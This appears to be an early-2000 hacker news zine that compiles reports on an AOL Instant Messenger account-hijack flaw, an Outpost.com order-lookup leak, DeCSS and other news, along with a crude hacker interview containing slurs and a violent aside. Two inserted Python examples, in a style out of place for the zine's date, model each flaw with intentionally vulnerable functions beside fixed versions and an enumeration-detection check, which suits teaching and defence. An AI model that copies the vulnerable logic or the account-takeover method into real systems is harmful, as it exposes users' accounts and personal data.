BLANKENSHIP: Sometimes animals will, when they congregate together as a family, if you get a couple of sick ones, and they have this feeling of responsibility, at least in my mind, you know, they have to take care of the animals that are sick.

TOBIN: So they moved the sick ones to a tank onshore, where they couldn't communicate with the other dolphin. Sadly, one of those died when it was moved.

DENISE JACKSON, WILDLIFE RESCUE: We have had scenarios that once the injured and the sick ones died, the healthy ones did leave.

TOBIN: Then the volunteers formed a human chain again, this time with kayakers in front.
With buckets of fish on their legs, they would try to act like the Pied Piper, tempting the dolphin out to sea. With all the people behind them scaring the dolphin, the survivors made it to the open water, where they can't be injured or trapped by the sharp coral in the shallow water of the Keys.

LANGE: We consider this a great success because there could have been a lot of them expired.

(END VIDEOTAPE)

LOCKRIDGE: That report from Mike Tobin, of our affiliate WSVN.

When you imagine a typical Internet user, you might think of a teenager endlessly chatting with friends, or a young business tycoon checking stock prices on a Palm Pilot. But the Internet's not just for the young. As Don Knapp reports, it's keeping some senior citizens young at heart.

(BEGIN VIDEOTAPE)

DAVID LANSDALE, GERIATRICS EXPERT: So let's go down one more, push your enter key.

DON KNAPP, CNN CORRESPONDENT (voice-over): David Lansdale's found a way to spark up the lives of the elderly. He gets them wired to the Internet.

LANSDALE: Now one more. Now type "au."

UNIDENTIFIED FEMALE: I thought maybe I was through with life, I was ready for a rocking chair because I was 86 years old, and I haven't found the rocking chair yet.

KNAPP: The average age of Lansdale's students is around 68. All are in nursing or assisted care homes. He used family relationships to introduce them to the Web.

LANSDALE: Here they are in California, a family was back in New York. The opportunity for them to connect, to cross that time and space, was an incredibly-precious opportunity to them.

UNIDENTIFIED FEMALE: I hear you are so beautiful.

KNAPP: Lillian Sher (ph) dictates an e-mail to a newborn great granddaughter. Working with one another, the seniors learn as a group, to both master the Internet and overcome what Lansdale calls the maladies of the institutionalized: loneliness, helplessness, boredom and cognitive decline.

MARY HARVEY, WEB SURFER: Bingo just doesn't appeal to me, but this does. Believe me, this does.
(LAUGHTER)

KNAPP: Ninety-four year-old Ruth Hyman is a star pupil and an instructor.

RUTH HYMAN, INTERNET INSTRUCTOR: When I sent a letter to my grandchildren, a great grandchildren, they hanged it up in their offices, just like I used to hang their drawings on my refrigerator.

LANSDALE: There's a collective benefit, there is an element of -- a tremendous element of therapy. And remember that we started as a support group.

DIXON MOOREHOUSE, WEB SURFER: I just wished I was 15 years old and getting to learn all this.

LANSDALE: The seniors call their weekly meetings Monday Night Live, and many say it's given them new life.

HYMAN: Three years ago they told me I wasn't going to live, but I showed them. I got on the Web and got work, and I worked ever since.

KNAPP: For SCIENCE & TECHNOLOGY WEEK, I'm Don Knapp.

(END VIDEOTAPE)

LOCKRIDGE: Thanks for joining us. I'm Rick Lockridge, in for Ann Kellan. Next week: technology evolution and how it affects you. The digital age has produced lots of new businesses and is threatening to kill off some old ones. It's survival of the fittest, where the losers become techno-saurs. That's coming up on the next SCIENCE AND TECHNOLOGY WEEK. We'll see you then.

TO ORDER A VIDEO OF THIS TRANSCRIPT, PLEASE CALL 800-CNN-NEWS OR USE OUR SECURE ONLINE ORDER FORM LOCATED AT www.fdch.com

-=-

ABC News; By Bill Redeker

Jan. 22 — Computer crime is on the rise. And as more people start purchasing online, entrusting their credit card numbers and other personal details to the ether, many experts say it is time to step up the battle for online security.

“You don’t even have to be a really knowledgeable intruder, you can just use one of these tools that are out there and break into a system,” says Kathy Fithin of the Computer Emergency Response Team at Carnegie Mellon University in Pittsburgh.

Last year the Response Team received reports of more than 8,000 Internet attacks and intrusions.
Connecticut-based CD Universe reported it received a fax from a hacker describing himself as a 19-year-old from Russia. The hacker offered to destroy the credit card files he had accessed through a flaw in the software for $100,000. When CD Universe passed up the offer, the hacker retaliated by posting up to 25,000 numbers on a Web site called Maxus Credit Card Pipeline.

Card Numbers Cause Alarm

“What’s interesting about this case is the sheer scale of the crime. The person claims to have 300,000 credit cards, which is an enormous amount,” says security expert Elias Levy.

Discover Financial Services, Visa, MasterCard and American Express are all working to get new cards to the customers compromised by the Russian hacker.

The Maxus incident is bound to reignite consumer concern over online security. At least 30 businesses are compromised every day, according to ABCNEWS research. The problem has led to a boom in computer security firms.

@Stake, a security firm in Boston, went to the source and hired eight of the most prominent hackers in the country, a group called L0pht Heavy Industries.

The L0pht crew consider themselves “gray-hat” hackers. Unlike black-hat hackers such as Maxus and white-hat vigilante hackers who sabotage kiddie-porn sites, L0pht identifies security flaws publicly then dares companies to fix them. Several L0pht members have testified in Congress about online security. They’ll be helping @Stake design systems that even they can’t penetrate.

“I think we really understand how people break into computer systems because we do it ourselves,” said Weld Pond, a L0pht member.

Hackers vs. hackers: it may be the face of the future.
@HWA

48.0 HNN: Jan 24: Several New Ezine Issues Available
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

I really hoped to review at least one of these for this issue, but the sites are so damn slow or overcrowded I couldn't reach them, so hopefully next issue I'll have some snippets/a review for you - Ed

From HNN http://www.hackernews.com/

contributed by Armour, The Hex, and others

New editions of several underground e-zines have been released. InET from Columbia in both English and Spanish, Issue #1 of Hack in the Box, Quadcon #3 from Australia and DataZine 0.01 from the folks at Datacore have hit the streets. Get your copies now!

InET
http://www.warpedreality.com/inet

Hack In the Box
http://www.thelimit.net/hitb

Quadcon
http://landfill.bit-net.com/~quadcon/quadcon-3.txt

DataZine
http://www.tdcore.com

If anyone else manages to get through and wants to write a review on these (or any other zine, even if it's your own *G*) go ahead and email it in and I'll post it in the zine. - Ed

Here's a taste of Quadcon by Amour from Australia (Issue #1)

****************************************************************************
***************************<-=- QuadCon -=->********************************
****************************************************************************
*************The Newest Zine To Hit Australia And The World*****************
*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/*/
============================================================================
December 1999 - Issue 1
============================================================================

What's In This Issue:

# Halcon Hacker Valiant Gives QuadCon An Exclusive Interview And Some Special Tips In Trying To Prevent Your Machine From Being Hacked

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

The Interview Of Valiant The Leader Of Halcon.
| http://www.halcon.com.au
----------------------------------------------

BackGround:

Halcon was founded in 1993 as a Bulletin Board System and by 1996 had grown to at least ten members. Still growing, in October 1996 the group took on the name Halcon Technologies and in 1997 Valiant registered a business name, allowing them to register the halcon.com.au domain name.

Although the group was not widely known, on 22nd October 1999, Halcon was blamed for a massive hack on the Australian Republican Movement website. Despite denials and misquotations, the story was covered by news outlets, an example of which is at the following URL: http://www.halcon.com.au/arm0001.html

Following this incident, Halcon received massive amounts of publicity (most of it was unwanted) and Valiant claims that Halcon has become the most popular hacking group in Australia. It currently has 24 members and thousands of supporters.

Having been misquoted once, Valiant has since denied all interviews to the press, including an offer from Channel Nine. QuadCon is therefore proud to present an exclusive, uncut interview with Valiant.

-------------------------------------------------------------------------------
The Interview
-------------

QuadCon: If you were a system administrator of a newly installed slackware linux machine and you had 20 minutes to secure it what would you do?

Valiant: Go to all the available sites (www.halcon.com.au/links.html) that cater for that, and quickly grab and install as many patches for your software available. Close all services (especially fingerd) that aren't needed, relocate telnet to a different port (I know it breaches RFC's, but fuck it.) and make sure that you don't adduser lamers. :)

QuadCon: What is the most common thing to hack to gain access to?

Valiant: Fingerd is the most exploitable feature on machines, the good old crackers highway.
Although these days it's neglected as a mode of system penetration, also a lot of sysadmins don't understand the point of finger anymore and remove it anyway. As for hacking, the best method available that I remember overusing would be a buffer overflow in a certain software which makes calls to root. Flood the software, bang, down it goes and you have root. :)

QuadCon: Does the name Halcon have any relevance to you and why did you choose it for the name of the group?

Valiant: Halcon .. well, I chose that many years ago, so I can't really remember why it was chosen, other than that it sounds funky. :P

QuadCon: How would you characterize the media coverage of you?

Valiant: Trivial and biased. They just want an 'evil hacker genius' who brags about how he hacked NASA, they don't really like me as basically I won't brag, and I prefer to explain how idiotic the consumers are for purchasing fucked computers, etc, and other consumer related problems.

QuadCon: What do you think about hacks done in your name--for instance, the Australian Republican Movement hack?

Valiant: I wasn't expecting such media coverage on that topic, however they have no evidence against me, and I have yet to admit to even being born at this point in time. So fuck 'em all. :)

QuadCon: What's the biggest misconception perpetuated by Hollywood cybermovies?

Valiant: There is no such thing as a hot female hacker named Acid Burn who has pert tits and lips that would look very nice wrapped around my hard disk. :)

QuadCon: In your own words, define hacker.

Valiant: There's two meanings. I fall into both. The code hacker, who lives to program and does it the hard way, and the system hacker, who loves finding exploitable features in systems to gain access, does so, notifies the sysadmin and patches the hole.

QuadCon: What is your technical background. (Which platform do you prefer PC/MAC? What is your online background? Do you do networking? Do you know programming languages, etc.)
Valiant: At the moment my preferred operating system is Windows 98 due to its usability and comprehensive system architecture, when it comes to personal use, for industrial things such as networking, I prefer any linux distribution. I am a PC user, although I have a few old Apple Classics in my computer collection. I've been using the internet through BBS gateways for ten or more years. I network when I have to, but I used to work as a network engineer. As for programming languages, I have a bad memory and generally have to 'relearn' things when I need them, however it's more a refresh than a relearn. :)

QuadCon: I understand that hackers assume an online nickname to become known by - how did you acquire your nickname?

Valiant: I was seven years old when I logged onto a BBS using an audio coupler 900 bps modem at a friend's place. It asked for a handle, Valiant was my current dungeons and dragons character, so I typed it in sheepishly. I've been known by it ever since. :)

QuadCon: What do you portray system administrators are like?

Valiant: Fail-safe devices that take care of systems, that if programmed correctly would never need human assistance. :)

QuadCon: What do you think of ALOC, another aussie hacking group?

Valiant: Who? :)

QuadCon: What currently is Halcon working on?

Valiant: Currently working on? We're currently working on the ultimate encyclopaedia of how to be slothenly and lazy. :)

QuadCon: What would you like Halcon to be in the future?

Valiant: I don't know, that's a hard question really. I never wanted it to be anything to begin with, time has just made it bigger than I ever expected. Back when I was a kid and it first started, I never really thought it would exceed a BBS group of users who were of the same interests. Now it's almost like a religious cult for some. :)

QuadCon: Who in the world do you dislike most?

Valiant: Anyone with an IQ under 110. :) 100 is average, so I like people a tad over. The others should be neutered and shot.
:)

QuadCon: Any last comments?

Valiant: I like being a cunt-rag.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Special Thanks
--------------

Valiant of Halcon http://www.halcon.com.au

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Support Us
----------

Please support us - we are looking for a fast permanent unix box to host a website with all our zines on. If you believe you can help see the contact section below. Also if you know anyone who wants or deserves to be interviewed also see the contact section below.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Contact
-------

I can be contacted on IRC irc.wiretapped.net or on the email address marena@iinet.net.au

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Copyright 1999 QuadCon

[This "how not to write a zine"-style document got this response from the people hosting the file (wiretapped.net):]

http://the.wiretapped.net/security/textfiles/quadcon/response.txt

@HWA

49.0 HNN: Jan 25: AIM Accounts Susceptible to Theft
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

AOL will always have problems of some sort, no matter what they do. The system is just too big and complex, and the operators do not know more than the basics of how the user interfaces work. Expect to see many more AOL/AIM etc. problems and exploits. - Ed

Oxymoron: "AOL tech support"

From HNN http://www.hackernews.com/

contributed by no0ne

A group of teenagers have discovered a way to take over any AOL Instant Messenger account as long as they know the person's screen name. A staff tool that was picked up from AOL's proprietary online service lets them exploit a hole in AOL 5.0's registration process, allowing them to reset users' passwords. During the AOL 5.0 registration process, AOL asks for a person's screen name.
The teenagers enter the screen name they want to have, when prompted for a password they make one up to get the "invalid password" message. AOL 5.0 then buffers the screen name within the registration process. The perpetrators then jump to another part of the registration process where AOL thinks the intruder is the rightful owner of the AIM screen name and permits the password to be reset. AOL says it is working to correct the problem.

C|Net
http://news.cnet.com/news/0-1005-200-1530654.html?dtn.head

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdhpnews01

MSNBC
http://www.msnbc.com/news/361415.asp

Wired
http://www.wired.com/news/business/0,1367,33881,00.html

CNET;

Hackers learn how to take over AOL IM accounts
By Courtney Macavinta
Staff Writer, CNET News.com
January 24, 2000, 4:30 p.m. PT

America Online Instant Messenger users could find their online identities stolen via a security hole that allows hackers to hijack their accounts through another popular service: AOL 5.0.

A small band of hackers has discovered a way to take over any AOL Instant Messenger (AIM) account as long as they have a person's screen name. By using an AOL staff tool they unearthed while poking around the company's proprietary online service, they exploit a public hole in the AOL 5.0 registration process that lets them reset AIM users' passwords.

Once the hackers do this handiwork, initial users of the screen names are locked out of their accounts, giving the hackers open access to users' "buddy lists" of other AIM users and the ability to maintain trial AOL 5.0 accounts under the same screen names, as confirmed by CNET News.com.

AOL spokesman Rich D'Amoto said he hasn't heard of any complaints about stolen AIM screen names, but that the company is looking into the issue and will try to track down the hackers.

"We're aware of the situation and we are deploying security measures to defeat the hackers," D'Amoto said.
More than 40 million people have registered AIM screen names and use the program to carry on short conversations or send quick alerts to their friends or co-workers. AIM users can set up private buddy lists and never have to share their screen names with people they don't know. But many users give up their names freely in chat rooms or through AIM's "find a buddy" feature, which lets users search for someone to talk with based on a common interest, such as books or religion.

The teen-age hackers who found the hole in AOL 5.0 say they have stolen more than a hundred names, such as "New York City." Some use the names they've seized to extract information about the person from friends and family. Mostly the ploy is a game.

"We do it if we've seen someone we don't like in a private chat room," one of the hackers said in an interview.

At one point, the high school senior said he tried to let AOL know about the hole. "If AOL would just listen to people like us instead of blowing us off and terminating our accounts, they could fix it," he said.

Security holes usually aren't kid's stuff to a major company such as AOL, however. In the wake of high-profile privacy breaches by way of human error and email-based attacks, AOL has been forced to take security seriously to ensure its more than 20 million members that their personal information, e-commerce transactions and communications are protected on its service.

AOL wants AIM registrants to feel safe, too; their frequent and consistent activity adds up to lucrative advertising dollars for AOL. And AOL's quality control and privacy measures will only become more important--and potentially harder to manage--as its acquisition of Time Warner takes shape.

AOL will likely try to close the loophole in the registration process that allows the hackers to assign a new password to the account.

Here's how it works: At one point in the 5.0 registration process, AOL asks for a person's screen name.
The hackers enter the screen name they intend to steal, but when asked for a password, they simply guess and get an "invalid password" message. The trick is that AOL has "buffered," or remembered, the screen name within the registration process. The hackers then use a tool that lets them jump to another part of the registration process. Once these steps have been taken, AOL thinks the hacker is the rightful owner of the AIM screen name and later on in the registration process permits the password to be reset.

Security experts say such abuses aren't rare.

"These software faults are more common than most people think; it's more common than we would like," said Elias Levy, of the consulting firm Security Focus. "Most companies, their first reaction is to deny the problem and then go into damage recovery mode and fix the problem without acknowledging it."

Although AIM users could simply register a new screen name, Levy said that having a name stolen could be more of a concern for people who use messenger or chat programs for professional reasons.

"It can be nerve wracking if someone stole your online personality," he said.

AOL said that if a person has had their AIM screen name stolen, for now they can use the program's "forgot password" feature to have an email sent to the address they provided at registration that includes the account's current password. Then the original holder of the screen name can reset the password once again.

-=-

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Hackers impersonate AOL users
By Lisa Napoli, MSNBC
January 24, 2000 6:09 PM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426698,00.html?chkpt=zdnntop

Since November, a group of teenagers say they have been stealing AOL Instant Messenger screen names and masquerading as their rightful owners.
The hackers sometimes act as imposters and pilfer credit card numbers and other personal data from friends and family of the exploited online users. The hackers demonstrated their method to MSNBC on Monday.

According to a letter the hackers sent on Sunday to members of the technology press, they use the names "just for the pure joy of trying to ruin friendships by insulting friends who have no idea they are talking to a hacker and not the victim." The hackers say they have contacted the media because AOL (NYSE: AOL) had not responded to their notification to them of the security hole.

An AOL spokesman, Rich D'Amato, said on Monday afternoon, "We are aware of the situation and are deploying security measures to defeat it. When hacker behavior crosses the line into illegal action, we'll certainly bring it to the attention of authorities."

D'Amato would not specify how many people had been affected or pinpoint the time line, saying those details could affect the investigation.

"AOL is so easy to abuse, it's pathetic," said TangentX, who says he is 17 years old and, along with two others, found the security hole this fall. They discussed it, he said, in special private chat rooms on AOL for hackers and use of the so-called "exploit" spread. He estimates that 400 names have been stolen to date.

AOL press materials say that 45 million people have created AOL Instant Messenger screen names as of last August. The popular software allows online users to chat privately, almost in real time, with others who have the software. AOL also owns ICQ, another popular instant messaging program, which claims 50 million registered users.

TangentX says he and others have found several ways to make an instant message screen name into an AOL account without the password. One involves resetting a password for a screen name through a security hole. The other involves taking a screen name, creating an AOL account for it and then changing the password.
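The CNET and MSNBC reports above describe the same underlying defect: a multi-step sign-up flow remembers a screen name entered at one step and lets a later step act on it, without the password check in between ever having succeeded. The following is an added example written for this issue, not AOL's code, modelling that defect as a small state machine beside a corrected version in which the reset step is only reachable once ownership has actually been verified. The screen name, password, directory and salt are constructed sample data.

```python
"""Sign-up flow that buffers an identity before verifying it, beside a fixed
version. Added example modelling the defect described in the AOL 5.0 reports;
not AOL's code. Every name and password here is constructed sample data."""
import hashlib
import hmac
from enum import Enum, auto

SALT = b"constructed-demo-salt"   # a real directory would salt per account


def _hash(password: str) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 10_000)


class Directory:
    """Screen name -> password hash store (constructed)."""

    def __init__(self, accounts: dict):
        self.accounts = dict(accounts)

    def verify(self, name: str, password: str) -> bool:
        return hmac.compare_digest(self.accounts[name], _hash(password))

    def set_password(self, name: str, password: str) -> None:
        self.accounts[name] = _hash(password)


def fresh_directory() -> Directory:
    # Constructed: one existing screen name whose owner knows the password.
    return Directory({"NewYorkCity": _hash("correct horse")})


class Step(Enum):
    NEW = auto()
    NAME_ENTERED = auto()     # a name is buffered, nothing proven yet
    OWNER_VERIFIED = auto()   # password check passed for that name


class Session:
    def __init__(self):
        self.step = Step.NEW
        self.screen_name = None


def enter_screen_name(d: Directory, s: Session, name: str) -> None:
    """Step 1: the user names an existing screen name; the flow buffers it."""
    if name not in d.accounts:
        raise KeyError(name)
    s.screen_name = name
    s.step = Step.NAME_ENTERED


def check_password(d: Directory, s: Session, password: str) -> bool:
    """Step 2: only a correct password advances the session. A wrong guess
    leaves the buffered name in place, which is what the vulnerable reset
    below relies on."""
    if d.verify(s.screen_name, password):
        s.step = Step.OWNER_VERIFIED
        return True
    return False


def reset_password_vulnerable(d: Directory, s: Session, new_pw: str) -> None:
    """Later step that trusts the buffered name: it checks that a name was
    entered, not that the password step succeeded, so it works after a
    failed guess or after skipping the password step entirely."""
    if s.screen_name is None:
        raise PermissionError("no screen name in session")
    d.set_password(s.screen_name, new_pw)


def reset_password_hardened(d: Directory, s: Session, new_pw: str) -> None:
    """Same step gated on the verified state, not on the buffered name; the
    session is then consumed so the proof cannot be replayed."""
    if s.step is not Step.OWNER_VERIFIED:
        raise PermissionError("ownership of the screen name was not verified")
    d.set_password(s.screen_name, new_pw)
    s.step = Step.NEW
    s.screen_name = None


def attacker_path(reset) -> bool:
    """Enter someone else's name, fail the password prompt, go to reset.
    Returns True if the rightful owner's password still works afterwards."""
    d, s = fresh_directory(), Session()
    enter_screen_name(d, s, "NewYorkCity")
    check_password(d, s, "wrong guess")
    try:
        reset(d, s, "attacker chosen")
    except PermissionError:
        pass
    return d.verify("NewYorkCity", "correct horse")


def owner_path(reset) -> bool:
    """The legitimate owner proves the password first, then resets.
    Returns True if the new password works afterwards."""
    d, s = fresh_directory(), Session()
    enter_screen_name(d, s, "NewYorkCity")
    check_password(d, s, "correct horse")
    reset(d, s, "new password")
    return d.verify("NewYorkCity", "new password")


if __name__ == "__main__":
    for label, fn in (("vulnerable", reset_password_vulnerable),
                      ("hardened", reset_password_hardened)):
        print(f"{label}: owner keeps account after attack={attacker_path(fn)}, "
              f"owner can reset={owner_path(fn)}")
```

The point of the `Step` enum is that the sensitive action is authorised by an explicit state reached only through the verification step, never by the mere presence of data the user typed earlier; that is the property the original flow lacked.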
When he was given a screen name on Monday afternoon by MSNBC, TangentX was able to access the account and send an instant message from the name in a matter of minutes.

-=-

MSNBC;

Fuck em, check the link yourself. :-/ (No I don't like Micro$loth)

-=-

Wired;

Hack Takes Aim at AOL Clients
Wired News Report
5:30 p.m. 24.Jan.2000 PST

A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report.

The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts.

"We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL.

AOL's online service is used to change passwords, so hackers are easily able to open new accounts using the existing AIM user's name. People who subscribe to AOL are not affected by the breach. People who use instant messaging software (AIM) outside of AOL, are.

D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action."

"Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said.

He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number."

David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process.

"AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected."
"AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks."

@HWA

50.0 HNN: Jan 25: Outpost Leaks Customer Info
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

By changing the order number in the URL users at Outpost.com are able to view the personal information, including the type of credit card used, of other users. An Outpost spokesperson said that the problem would be fixed immediately. (This type of problem is extremely old, it is surprising that such a large company such as Outpost has this problem. This just further illuminates the need for effective e-commerce security.)

Wired
http://www.wired.com/news/technology/0,1282,33842,00.html

Outpost Leaves Data Unguarded
by Chris Oakes
1:25 p.m. 24.Jan.2000 PST

While James Wynne was checking his online order Friday at Outpost.com, he noticed something curious -- he could check orders from other people, too.

He noticed that the long Web page address for his transaction included his order number, and decided to see what happened if he changed a digit to try and access other customers' records. The modified address pulled up the same detailed transaction summary for another customer's order number -- including a full range of sensitive, and valuable, personal data.

"You can see someone's email address, their billing address, their shipping address, type of credit card they used, their order history -- everything they bought, everything they received, everything they're currently waiting for," Wynne said.

In addition to exposing nuggets of information about individuals -- tying their email identity to their street address, and revealing recent purchases -- the security glitch could be exploited by marketers to build databases of target customers, said Wynne.
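The flaw Wynne describes is a record looked up by the guessable number in the URL with no check that it belongs to the person asking. Below is an added example written for this issue, not Outpost.com's code, that puts the unguarded lookup beside a hardened one (the record must belong to the logged-in account, and the URL may carry a random token instead of the sequential order number) and adds a small check over web-server log lines that flags a client sweeping many order numbers. All orders, customer names, paths, addresses and log lines are constructed.

```python
"""Order-status lookup with the missing ownership check, a hardened lookup,
and a log check for order-number enumeration. Added example, not
Outpost.com's code; all orders, names, URLs and log lines are constructed."""
import re
import secrets
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Order:
    order_no: int      # sequential, printed on invoices, easy to guess
    customer: str      # account that placed the order
    card_type: str
    items: tuple


# Constructed sample store: three orders from two customers.
ORDERS = {
    10041: Order(10041, "alice", "Visa", ("PalmPilot",)),
    10042: Order(10042, "bob", "MasterCard", ("56k modem",)),
    10043: Order(10043, "alice", "Visa", ("CD-R drive",)),
}


class NotFound(Exception):
    pass


def lookup_vulnerable(order_no: int, current_user: str) -> Order:
    """Resolves the record by the number in the URL alone. The logged-in
    account is never consulted, so changing a digit walks through other
    customers' orders."""
    order = ORDERS.get(order_no)
    if order is None:
        raise NotFound(order_no)
    return order


def lookup_hardened(order_no: int, current_user: str) -> Order:
    """Same lookup with an ownership check. Missing and not-yours raise the
    same error so the URL cannot be used to probe which numbers exist."""
    order = ORDERS.get(order_no)
    if order is None or order.customer != current_user:
        raise NotFound(order_no)
    return order


def can_view(lookup, order_no: int, current_user: str) -> bool:
    """True if `lookup` returns the order for this user, False if refused."""
    try:
        lookup(order_no, current_user)
        return True
    except NotFound:
        return False


# Second layer: an unguessable token in the URL instead of the sequential
# number. The ownership check still applies; the token only removes guessing.
_TOKENS: dict = {}


def issue_token(order_no: int) -> str:
    token = secrets.token_urlsafe(16)
    _TOKENS[token] = order_no
    return token


def lookup_by_token(token: str, current_user: str) -> Order:
    order_no = _TOKENS.get(token)
    if order_no is None:
        raise NotFound(token)
    return lookup_hardened(order_no, current_user)


# Detection: a customer views one or two of their own orders; a client that
# requests many distinct order numbers is sweeping the URL space.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET /order/status\?order_no=(\d+) ')

# Constructed web-server log lines in common log format.
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Jan/2000:13:01:02 -0800] "GET /order/status?order_no=10041 HTTP/1.0" 200 812',
    '203.0.113.5 - - [24/Jan/2000:13:02:10 -0800] "GET /order/status?order_no=10042 HTTP/1.0" 200 790',
    '203.0.113.5 - - [24/Jan/2000:13:02:11 -0800] "GET /order/status?order_no=10043 HTTP/1.0" 200 801',
    '203.0.113.5 - - [24/Jan/2000:13:02:12 -0800] "GET /order/status?order_no=10044 HTTP/1.0" 404 212',
    '203.0.113.5 - - [24/Jan/2000:13:02:13 -0800] "GET /order/status?order_no=10045 HTTP/1.0" 200 799',
    '198.51.100.7 - - [24/Jan/2000:13:05:40 -0800] "GET /order/status?order_no=10043 HTTP/1.0" 200 801',
]


def enumeration_suspects(log_lines, threshold: int = 3) -> dict:
    """Return {client_ip: sorted order numbers} for clients that requested
    at least `threshold` distinct order numbers."""
    seen = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line)
        if m:
            seen[m.group(1)].add(int(m.group(2)))
    return {ip: sorted(n) for ip, n in seen.items() if len(n) >= threshold}


if __name__ == "__main__":
    print(lookup_vulnerable(10042, "alice"))        # bob's order, leaked
    print(can_view(lookup_hardened, 10042, "alice"))  # False: refused
    print(enumeration_suspects(SAMPLE_LOG))
```

Note that a 404 for a non-existent number still counts toward the sweep in `enumeration_suspects`: the probing is visible whether or not each guess lands, which is why the log check belongs alongside the authorisation fix rather than instead of it.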
"I could set up a data-mining program that would check random [order] numbers and find out all people who bought PalmPilots at Outpost.com," he said.

Outpost.com acknowledged the flaw Monday and said it would have the problem fixed by the end of the day. But the vulnerability did not represent a dramatic risk, the company said.

Most commerce sites prevent the simple searching of their database by encrypting or otherwise preventing the data from appearing in URLs.

"It shouldn't be there, but it is," said Outpost.com spokesman Craig Andrews. "It's sort of hidden buried away in the URL," he said, claiming that only hackers looking for holes would be able to find it.

Furthermore, he said, while the hole revealed both personal and purchasing information, it did not betray credit card numbers or other vital financial information.

"It's unfortunate that pricing and product information is there. But the other personal information is all over the place. You can go to a place like [Web information directory] 411 and get addresses and personal email."

However, Andrews acknowledged that people generally volunteer the information in directory services, and purchasing information is not included.

Ray Everett-Church, chief privacy officer at Alladvantage.com and longtime spam-watcher, said the flaw is more of a threat than Outpost portrayed it to be.

"I would certainly consider this a threat to not only integrity of data privacy promises a site might make, but certainly to the kinds of confidence level that companies should be trying to instill in consumers," Everett-Church said. "It causes folks to question the security of these transactions and the advisability of entering into them in the first place."

Was it an oversight that led to the hole? Technically, yes, but not really, said Outpost.com's Andrews.

"Between management of the site and the software they use to manage orders, it was just something that hadn't come up....
It wasn't really an oversight by the textbook definition."

Everett-Church said he doesn't think the public hears about personal data vulnerabilities nearly as often as they occur.

"I think these sorts of Web ordering systems have these problems quite frequently -- probably more frequently than we realize. All it takes is a clever hacker to keep poking and prodding at the systems to find these kinds of weaknesses."

@HWA

51.0 HNN: Jan 25: DeCSS Author Raided
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Zorro

The National Authority for Investigation and Prosecution of Economic and Environmental Crime in Norway has raided the home of Jon Johansen of Steinsholt Norway. Jon is the author of the controversial software DeCSS. Authorities confiscated his computer and cellphone, they also questioned him for up to seven hours. Both Jon and his father have been charged with breaking the copyright act and the penal law which could result in up to 3 years in prison.

Slashdot
http://slashdot.org/articles/00/01/24/2024233.shtml

VG - Norwegian
http://www.vg.no/pub/vgart.hbs?artid=5712180

TV 2 - Norwegian
http://www2.tv2.no/nyss/n2i.vis?par=70&par=1623664&ext=378097

@HWA

52.0 HNN: Jan 25: Solaris May Go Free and Open
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Jay

When Solaris 8 is unveiled Wednesday in New York it is expected that Sun will also announce that the software will be free as well opening access to the software's source code. Solaris 8 is expected to ship in February.

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html

--------------------------------------------------------------
This story was printed from ZDNN,
located at http://www.zdnet.com/zdnn.
--------------------------------------------------------------

Sun fights Linux, WinNT with 'free Solaris'
By Deborah Gage, Sm@rt Reseller
January 24, 2000 8:58 AM PT
URL: http://www.zdnet.com/zdnn/stories/news/0,4586,2426200,00.html?chkpt=zdhpnews01

Sun Microsystems Inc. is expected to eliminate licensing fees for Solaris 8 to boost its appeal against Linux and Microsoft Windows NT, say sources close to the company.

Sun is expected to make its "free Solaris" campaign the centerpiece of its Solaris 8 unveiling, which takes place this Wednesday in New York City. At that event, Sun also is expected to announce it will open up access to Solaris 8 source code.

Solaris 8 is due to ship in February, around the same time Microsoft is due to ship Windows 2000.

